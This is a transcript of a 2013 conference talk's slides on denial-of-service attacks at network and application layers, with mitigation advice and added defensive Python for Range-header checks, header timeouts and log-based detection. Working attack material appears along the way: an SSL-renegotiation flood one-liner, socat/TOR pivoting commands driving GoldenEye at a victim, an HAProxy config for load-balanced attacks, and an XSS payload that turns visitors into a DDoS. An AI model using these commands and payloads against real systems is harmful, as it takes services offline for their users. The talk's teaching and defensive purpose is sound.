The document discusses denial-of-service (DoS) attacks and their targets at different layers of the OSI model. Layer 3 attacks target bandwidth consumption through techniques like ping floods and SYN floods. Layer 7 attacks target application resources through vectors like SSL handshake renegotiation to cause intense CPU usage on the server. The document outlines how Layer 7 attacks are more stealthy and efficient at causing damage than Layer 3 attacks.
2. $ whoami
Full Name: Jan Seidl
Origin: Rio de Janeiro, RJ – Brazil
Work:
● Technical Coordinator @ TI Safe
● OpenSource contributor for: PEV, Logstash
● Codes and snippets @ github.com/jseidl
Features:
● UNIX Evangelist/Addict/Freak (but no fanboy!)
● Python and C lover
● Coffee dependent
● Hates printers and social networks
● Proud DC Labs Member
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
3. agenda
0x0 Introduction to Denial-of-Service
0x1 Background: Layer 3 attacks
0x2 Attacking Layer 7: Fundamentals
0x3 Attacking Layer 7: Vectors & Tools
0x4 WebServer DoS Mitigation 101
0x5 Proxies (SOCKS/TOR) and Layer 7 attacks
0x6 Jericho Attack Technique: Load-balancing attacks
0x7 XSS D/DoS
0x8 Size doesn't matter: Mobile-launched Denial-of-Service
0x9 Demo/Video: GoldenEye MdoS Android Tool
0xA Questions?
4. Introduction to Denial-of-Service
What is denial of service?
5. Introduction to Denial-of-Service
What is denial of service?
A denial-of-service attack (...) is an attempt to make a machine or network resource unavailable to its intended users.
Source: Wikipedia/en_US
6. Introduction to Denial-of-Service
7. Introduction to Denial-of-Service
Result?
8. Introduction to Denial-of-Service
Result?
9. Introduction to Denial-of-Service
10. Introduction to Denial-of-Service
Symptoms
Oddly low performance
Unavailability of given resource
Unavailability of all resources
11. Introduction to Denial-of-Service
Recent Cases
13. Introduction to Denial-of-Service
18. Introduction to Denial-of-Service
Targets (OSI layer)
Network (Layer 3): bandwidth consumption
Application (Layer 7): application or operating system resources consumption
19. Introduction to Denial-of-Service
Network (Layer 3): bandwidth consumption
20. Background: Layer 3 attacks
Popular Attacks
Ping Flood
(…) is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP Echo Request (ping) packets (...) The attacker hopes that the victim will respond with ICMP Echo Reply packets, thus consuming both outgoing bandwidth as well as incoming bandwidth.
Source: Wikipedia/en_US
21. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
22. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
23. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
24. Background: Layer 3 attacks
Popular Attacks
SYN Flood
25. Background: Layer 3 attacks
Popular Attacks
SYN Flood
26. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
“When the sum of the offset and size of one fragmented packet differ from that of the next fragmented packet, the packets overlap, and the server attempting to reassemble the packet can crash, especially if it is running an older operating system that has this vulnerability.”
http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html
27. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
28. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
29. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
30. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
31. Attacking Layer 7: Fundamentals
Application (Layer 7): application or operating system resources consumption
32. Attacking Layer 7: Fundamentals
Focus
Layer 3: exhaust bandwidth
Layer 7: exhaust application or operating system key resources
33. Attacking Layer 7: Fundamentals
Stealthiness
Layer 3: high network noise (noisy attack)
Layer 7: low network noise, might emulate legit requests
34. Attacking Layer 7: Fundamentals
Efficiency
Layer 3: requires lots of participants for a significant outage. May be blocked by sparring.
Layer 7: sometimes only one machine can cause damage. Difficult to block.
35. Attacking Layer 7: Fundamentals
Mitigation
Layer 3: large link, connection-limiting, rate-limiting, sparring
Layer 7: ?
36. Attacking Layer 7: Fundamentals
Layer 7 attack targets
Intense CPU, disk I/O & swapping operations, long/slow/complex queries
Finite application resources: maximum socket limits, maximum memory limits, disk space etc.
37. Attacking Layer 7: Vectors & Tools
38. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
15% more processing power needed on the server than on the client to establish the handshake.
In the wild since 2003.
Still affects most implementations.
Found by the THC group (www.thc.org) in 2011.
39. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Tool:
THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>
- or, as a shell one-liner (each "R" written to s_client's stdin requests a renegotiation; the loop keeps reopening the connection):
thcssldosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thcssldosit & done
40. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Affects any TLS/SSL-secured protocol: HTTPS, SMTPS, POP3S, database secure ports etc.
Mitigation?
Turning off SSL renegotiation might help, but does not solve it.
SSL accelerators might help, but also don't 100% solve it.
IPTables mitigation:
http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html
41. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Parallel requests for many small GZIP'ed parts of the same content.
Forces the webserver to perform several parallel compression operations = high load.
Discovered in 2011 (CVE-2011-3192)
42. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Tools:
killapache.pl <http://seclists.org/fulldisclosure/2011/Aug/175>
Slowhttptest <http://code.google.com/p/slowhttptest/>
43. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Mitigation:
SetEnvIf or mod_rewrite
(ref: http://httpd.apache.org/security/CVE-2011-3192.txt)
Use a WAF (Web Application Firewall)
Update Apache to version 2.2.21 or greater
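The advisory referenced above implements its workaround as a SetEnvIf/mod_rewrite rule that refuses requests listing more than five byte ranges. The Python below is an added example, not code from the talk or from Apache: it expresses the same check in a form whose logic can be inspected and unit-tested. It parses the Range header (and the legacy Request-Range header the advisory also covers), rejects malformed range sets outright, and returns "strip" (serve the full resource, ignore the header) when the count exceeds the limit. The five-range limit mirrors the advisory; the dict-of-headers input shape is an assumption of this example.

```python
import re

# Most byte ranges a single request may ask for.  The Apache advisory for
# CVE-2011-3192 treats more than five as abusive; the same limit is assumed here.
MAX_RANGES = 5

# One range spec: "first-last", "first-" (open ended) or "-suffix".
_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(header_value):
    """Parse a 'bytes=' Range header value into a list of (first, last) tuples.

    'last' is None for open-ended ranges ("500-") and 'first' is None for
    suffix ranges ("-500").  Anything malformed raises ValueError so the
    caller refuses the request instead of guessing what was meant.
    """
    unit, sep, specs = header_value.strip().partition("=")
    if sep != "=" or unit.strip().lower() != "bytes":
        raise ValueError("unsupported range unit: %r" % unit)
    ranges = []
    for spec in specs.split(","):
        m = _RANGE_SPEC.match(spec.strip())
        if not m or m.group(1) == m.group(2) == "":
            raise ValueError("malformed range spec: %r" % spec)
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        if first is not None and last is not None and last < first:
            raise ValueError("range ends before it starts: %r" % spec)
        ranges.append((first, last))
    return ranges


def range_header_verdict(headers):
    """Return 'allow', 'strip' or 'reject' for one request's header dict.

    'strip' means: answer with the complete resource and ignore the Range
    header, which is the low-impact option the advisory recommends.
    Header names are matched case-insensitively (an assumption of this example).
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in ("range", "request-range"):
        value = lowered.get(name)
        if value is None:
            continue
        try:
            ranges = parse_byte_ranges(value)
        except ValueError:
            return "reject"          # garbage in the header: refuse outright
        if len(ranges) > MAX_RANGES:
            return "strip"           # too many ranges: serve the whole file
    return "allow"
```

A request such as `Range: bytes=0-,1-2,3-4,5-6,7-8,9-10` comes back as "strip", a single `bytes=0-499` as "allow", and a spec whose end precedes its start as "reject"; wire the verdict to whatever your front end uses to unset a header or return 403.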
44. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers, Slow Post, Slow Read
Read or send data in small chunks, with an interval between reads / writes.
Waiting for the full request is part of the web server's nature.
45. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
Slow Post: send request post body (post data) 'Slowly'
Slow Read: small TCP window size to force slow response reading
46. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
GET / HTTP/1.1\r\n /* sleep(1) */
Connection: keep-alive\r\n /* sleep(1) */
...
47. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Post: send request post body (post data) 'Slowly'
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Accept: text/html;q=0.9,text/plain;q=0.8
foo=bar /* sleep(1) */
bar=baz /* sleep(1) */
baz=foo /* sleep(1) */
...
48. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Read: small TCP window size to force slow response reading
/* pseudocode */
int len = 1;
while (data = read(sock, buffer, len)) {
sleep(5);
…
}
49. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Tools:
Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post Tool
Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool
Slow Read: slowhttptest
50. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks - Mitigation:
Slow Headers: request timeout (Apache's mod_reqtimeout), WAF
Slow Post: request timeout, WAF
Slow Read: disable pipelining and oddly slow window sizes, limit maximum request time, WAF
Good article on slow attacks mitigation:
https://community.qualys.com/blogs/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks
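The request timeout named above is mod_reqtimeout's RequestReadTimeout directive, and the detail that makes it work against slow-headers clients without hurting slow links is the MinRate clause: the client gets an initial budget, every byte it sends extends the deadline a little, and the deadline is capped. The Python model below is an added example, not Apache code and not part of the talk. It replays constructed per-connection traces of (seconds since accept, bytes received) against a header=20-40,MinRate=500 policy and reports whether the header phase completes or times out. The continuous accounting (1/500 s per byte) is a simplification of Apache's implementation, which counts in whole seconds per 500 bytes; the traces are constructed.

```python
HEADER_END = b"\r\n\r\n"   # end of the HTTP header block


class HeaderReadTimeout:
    """Model of mod_reqtimeout's 'RequestReadTimeout header=initial-maximum,MinRate=rate'.

    The client has `initial` seconds to deliver the complete header block.
    Each received byte buys 1/min_rate more seconds, but the deadline never
    moves past `maximum` seconds after accept().  Setting maximum == initial
    gives a fixed timeout with no rate extension.
    """

    def __init__(self, initial=20, maximum=40, min_rate=500):
        if maximum < initial or min_rate <= 0:
            raise ValueError("bad timeout policy")
        self.initial = initial
        self.maximum = maximum
        self.min_rate = min_rate

    def evaluate(self, events):
        """Replay (t_seconds, chunk_bytes) events in time order.

        Returns ('complete', t) when the header terminator arrives before the
        deadline, or ('timeout', deadline) when the connection would be dropped.
        """
        received = bytearray()
        deadline = float(self.initial)
        for t, chunk in events:
            if t > deadline:
                return ("timeout", deadline)      # data arrived too late
            received += chunk
            if HEADER_END in received:
                return ("complete", t)            # full header block in time
            # Extend the deadline for bytes received so far, up to the cap.
            deadline = min(self.initial + len(received) / self.min_rate,
                           float(self.maximum))
        # Client went quiet without finishing: it is dropped at the deadline.
        return ("timeout", deadline)


# Constructed traces (not captured traffic).
# Slowloris-style client: one request line, then a bogus header every 10 s, forever.
SLOW_HEADERS_CLIENT = [(0, b"GET / HTTP/1.1\r\n")] + \
                      [(10 * i, b"X-a: b\r\n") for i in range(1, 7)]
# Ordinary browser: the whole header block in one segment, 50 ms after accept.
NORMAL_CLIENT = [(0.05, b"GET / HTTP/1.1\r\nHost: www.example.test\r\n"
                        b"User-Agent: browser\r\n\r\n")]
# Legitimate client on a slow link: a fat first segment, the rest 21 s later.
# It finishes only because the 636 bytes it already sent extended the deadline.
SLOW_LINK_CLIENT = [(0, b"GET /big-form HTTP/1.1\r\nX-Filler: " + b"a" * 600 + b"\r\n"),
                    (21, b"Host: www.example.test\r\n\r\n")]


def summarize(policy, traces):
    """Map each named trace to the policy's verdict, for a quick comparison."""
    return {name: policy.evaluate(events)[0] for name, events in traces.items()}


if __name__ == "__main__":
    traces = {"slow-headers": SLOW_HEADERS_CLIENT,
              "normal": NORMAL_CLIENT,
              "slow-link": SLOW_LINK_CLIENT}
    print("header=20-40,MinRate=500:", summarize(HeaderReadTimeout(), traces))
    print("header=20 (fixed):       ", summarize(HeaderReadTimeout(20, 20), traces))
```

The comparison at the bottom is the point of the exercise: the fixed 20 s timeout drops the slow-link client along with the slow-headers one, while the rate-extended policy keeps the client that is actually making progress and still expires the one trickling a few bytes every ten seconds.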
51. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache
Keep connections open and force cache regeneration.
First POC:
HULK – HTTP Unbearable Load King
Created in May 2012 by Barry Shteiman.
<http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>
52. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache: HULK
Highly effective against IIS, Apache & reverse proxies
Caveat: Python's urllib2 always sends the headers in the same order, which makes the tool easy to fingerprint
SpiderLabs: ModSecurity rule to mitigate urllib attacks (HULK)
(http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)
53. Attacking Layer 7: Vectors & Tools
Randomization FTW!
54. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
● Author: Me! :)
● Initially born as a HULK fork due to its fingerprinting weakness
● Transformed further into a new independent HTTP DoS tool
● Born to test WAF blocking abilities under random and semi-natural payloads
● Available at https://github.com/jseidl/GoldenEye
55. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP KeepAlive + NoCache + Randomness: GoldenEye
Main Features:
GET, POST or Random HTTP methods
Random headers quantity
Random Headers content with legit values as per RFC
Better random block function to avoid fingerprinting
Hackers to Hackers Conference 2012 – São Paulo, Brasil
56. Attacking Layer 7: Vectors & Tools
Mitigation
Granular page permissions: filter POST where not needed; filter querystring parameters where not needed
ProxyCache: use caching proxies (ex: Varnish) and disable cache reload
KeepAlive and TimeOuts: tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and the equivalent in other webservers
57. WebServer DoS Mitigation 101
58. WebServer DoS Mitigation 101
Apache
LimitRequestFields, LimitRequestFieldSize,
LimitRequestBody, LimitRequestLine,
LimitXMLRequestBody, TimeOut,
KeepAliveTimeOut, ListenBackLog,
MaxRequestWorkers [core]
RequestReadTimeout [mod_reqtimeout]
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
59. WebServer DoS Mitigation 101
Nginx
client_max_body_size, client_body_buffer_size,
client_header_buffer_size,
large_client_header_buffers, client_body_timeout,
client_header_timeout [core]
Modules: HttpLimitReqModule,
HttpLimitZoneModule
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
60. WebServer DoS Mitigation 101
IIS 6 & 7
IIS 6: connectionTimeout, HeaderWaitTimeout,
MaxConnections
IIS 7: <RequestLimits> maxAllowedContentLength,
maxQueryString, maxUrl
<headerLimits>
<Limits>/<WebLimits> connectionTimeout,
headerWaitTimeout, minBytesPerSecond
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks
61. WebServer DoS Mitigation 101
USE A WEB APPLICATION FIREWALL (WAF)
Modsecurity (Apache / Nginx)
http://www.modsecurity.org/
NAXSI (Nginx)
http://code.google.com/p/naxsi/
62. Proxies and Layer 7 attacks
63. Proxies and Layer 7 attacks
Layer 3: bad to attack through proxies, as they usually have low bandwidth and you might get banned from them
Layer 7: requires low bandwidth; low network noise; not degraded by low output
64. Proxies and Layer 7 attacks
Why use proxies in HTTP attacks?
Simple answer
Geographic location at your will
Different source IPs
Can provide high anonymity
Largely available on the internet
65. Proxies and Layer 7 attacks
Attack pivoting by proxies
Tool:
Socat: Multipurpose Relay
http://www.dest-unreach.org/socat/
Also with SSL support:
HTTPS, IMAPS, POPS, LDAPS
66. Proxies and Layer 7 attacks
Attack pivoting by proxies: Regular Proxies
# socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
67. Proxies and Layer 7 attacks
Attack pivoting by proxies: TOR
# socat TCP4-LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
# echo "127.0.0.1 <VICTIM_HOST>" >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php -t 1000 -m get
68. Proxies and Layer 7 attacks
Bonus: Multi-TOR
The TOR client supports spawning as many instances and opening as many circuits as necessary.
tor --RunAsDaemon 1 --CookieAuthentication 0 --HashedControlPassword "pwd" --ControlPort 4444 --PidFile torN.pid --SocksPort 5090 --DataDirectory data/torN
Tool:
Multi-TOR
https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instances
69. Proxies and Layer 7 attacks
Mitigating TOR with TORBlock
Blocking TOR-sourced access
TORBlock: IPTables-based blocking
Tool:
https://github.com/jseidl/torblock
70. Load Balancing Attacks
Meet Jericho
71. Load Balancing Attacks
Starring: HAProxy
“The Reliable, High Performance TCP/HTTP Load Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }
72. Load Balancing Attacks
'Load-balanced' attacks anatomy
Attacker:
1. Open lots of socat tunnels to the victim, each one from a different proxy (regular, TOR or both)
2. Put the local port addresses (the socat'ed ones) on HAProxy
3. Place the victim's domain on /etc/hosts
4. Attack normally from your favorite tool
73. Load Balancing Attacks
'Load-balanced' attacks anatomy
listen ddos 0.0.0.0:80
    mode tcp
    balance roundrobin
    server inst1 localhost:8080
    server inst2 localhost:8081
    server inst3 localhost:8082
    server inst4 localhost:8083
    …
74. Load Balancing Attacks
'Load-balanced' attacks anatomy
75. Load Balancing Attacks
'Load-balanced' attacks anatomy
[Diagram: Attacker → HAProxy → Proxy 1, Proxy 2, Proxy 3, Proxy 4, Proxy 5, Proxy 6, Proxy 7 → Victim]
76. Load Balancing Attacks
'Load-balanced' attacks anatomy
77. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
● Bypass connection-limiting
● DoS → DDoS
● Multiple origin IPs
● Origins can be from multiple countries
78. Load Balancing Attacks
Dangers of 'load-balanced' attacks?
79. Load Balancing Attacks
More about the Jericho Attack Technique
http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective
80. XSS D/DoS
What if an XSS flaw could turn your visitors into D/DoS
clients?
<script>
function DDoS() {
  a = new Date()
  unixepoch = a.getTime()
  elm = document.createElement("img")
  victimURL = "http://10.1.1.114/"
  elm.src = victimURL+"?"+unixepoch   // fresh query string on every request, so nothing is served from cache
}
setInterval("DDoS()",1);
</script>
81. Mobile-launched Denial-of-Service
PoC Tool: GoldenEye Mobile
82. Mobile-launched Denial-of-Service
Objective
Test if mobile devices alone could conduct a successful DoS attack.
Test if equipment and configurations are able to deter DoS attacks from mobile platforms.
83. Mobile-launched Denial-of-Service
Android: Limitations
Max 128 threads (Android 2.1)
Maximum number of concurrent sockets per thread: 30 (>30 → "too many open files")
Can we get better results if the device is 'rooted' (sysctl)?
84. Mobile-launched Denial-of-Service
Firepower
5 min test on an Apache webserver, default configuration, in a Debian 6 virtual machine, also with default configuration.
CPU Usage: u5.85 s4.52 cu0 cs0 2.37% CPU load
Low CPU fingerprint
Server overloaded (a.k.a. down)
https://github.com/jseidl/GoldenEye-Mobile
85. Mobile-launched Denial-of-Service
GoldenEye Mobile: Mitigation
GoldenEye Mobile uses the HEAD method for maximum speed.
Easily blocked (module: mod_rewrite):
RewriteEngine on
RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
RewriteRule .* - [F]
mod_security:
SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"
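The tools covered on the HTTP KeepAlive + NoCache slides (HULK, GoldenEye), the XSS variant above and GoldenEye Mobile each leave a recognisable footprint in a plain access log, without needing a WAF in the path: a never-repeated query string on request after request to the same path (the cache-busting trick; the XSS payload appends a timestamp), or a request mix that is almost entirely HEAD. The detector below is an added example and is not part of GoldenEye, ModSecurity or the talk. It parses combined-format log lines (the sample lines are constructed, using documentation-range addresses) and flags clients whose request mix matches either pattern. The thresholds are assumptions to tune per site, and the function should be fed a time window of lines rather than a whole log file.

```python
import re
from collections import Counter, defaultdict

# Apache/Nginx "combined" access log line:
# client ident user [time] "METHOD target HTTP/x.y" status bytes ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access log line into the fields scored below; None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None                      # skip rather than guess
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "method": m.group("method"),
            "path": path, "query": query}


def flag_clients(lines, min_requests=5, ratio=0.8):
    """Return {client_ip: [reasons]} for clients matching a tool-like request mix.

    'cache-busting': at least `ratio` of the client's requests carry a query
                     string that this client never repeats.
    'head-flood':    at least `ratio` of the client's requests use HEAD.
    Clients with fewer than `min_requests` lines in the window are ignored.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            per_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in per_ip.items():
        if len(recs) < min_requests:
            continue                     # too little traffic to judge
        reasons = []
        query_counts = Counter(r["query"] for r in recs if r["query"])
        singletons = sum(1 for r in recs
                         if r["query"] and query_counts[r["query"]] == 1)
        if singletons / len(recs) >= ratio:
            reasons.append("cache-busting")
        head_share = sum(1 for r in recs if r["method"] == "HEAD") / len(recs)
        if head_share >= ratio:
            reasons.append("head-flood")
        if reasons:
            flagged[ip] = reasons
    return flagged


# Constructed sample log window (not real traffic; RFC 5737 addresses).
STAMP = "[10/Oct/2013:14:02:01 -0300]"
SAMPLE_LOG = [
    # an ordinary visitor: a page, its stylesheet, a repeated query, a login
    '203.0.113.5 - - %s "GET /index.php HTTP/1.1" 200 5120' % STAMP,
    '203.0.113.5 - - %s "GET /css/site.css HTTP/1.1" 200 880' % STAMP,
    '203.0.113.5 - - %s "GET /index.php?page=2 HTTP/1.1" 200 5200' % STAMP,
    '203.0.113.5 - - %s "POST /login.php HTTP/1.1" 302 0' % STAMP,
    '203.0.113.5 - - %s "GET /index.php?page=2 HTTP/1.1" 200 5200' % STAMP,
] + [
    # cache-busting client: same path, a query value that never repeats
    '198.51.100.7 - - %s "GET /index.php?ZKQ=%d HTTP/1.1" 200 5120'
    % (STAMP, 1381424521000 + i) for i in range(6)
] + [
    # HEAD-only client
    '192.0.2.9 - - %s "HEAD / HTTP/1.1" 200 0' % STAMP for _ in range(6)
]

if __name__ == "__main__":
    for ip, why in sorted(flag_clients(SAMPLE_LOG).items()):
        print(ip, ", ".join(why))
```

The output of `flag_clients` is a candidate list, not a block list: feed the flagged addresses into the rate-limiting or WAF layer you already run, and keep the window short so a busy legitimate client that happens to carry unique tracking parameters is reviewed rather than silently dropped.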
86. Demo: DoS Fun
GoldenEye Mobile DoS Android Tool Demo!
http://bit.ly/GoldenEyeMDOS
87. Questions?
88. Thanks!
– To Peace!
89. Thanks!
Thanks for your time!
jseidl@wroot.org / http://wroot.org
https://github.com/jseidl
http://www.slideshare.net/jseidl
@jseidl